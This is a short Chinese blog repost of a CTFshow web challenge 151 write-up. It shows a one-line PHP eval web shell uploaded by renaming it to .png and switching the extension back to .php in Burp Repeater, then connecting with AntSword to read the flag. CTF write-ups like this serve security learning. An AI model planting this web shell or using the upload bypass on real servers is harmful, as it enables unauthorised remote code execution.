首页 > Web开发 > 详细

CTFshow WEB入门151

时间:2021-02-03 23:40:27      阅读:111      评论:0      收藏:0      [点我收藏+]

只能上传png图片,我们写一个一句话木马<?php @eval($_POST[‘attack‘]) ?>
重命名为1.png,bp抓包,然后上传,
ctrl+R放到repeater中,将1.png改为1.php
技术分享图片
GO一下,发现上传成功,返回了上传路径/upload/1.php
用蚁剑连接,在/var/www/html路径发现flag.php
技术分享图片

CTFshow WEB入门151

原文:https://www.cnblogs.com/z1ten9/p/14369855.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!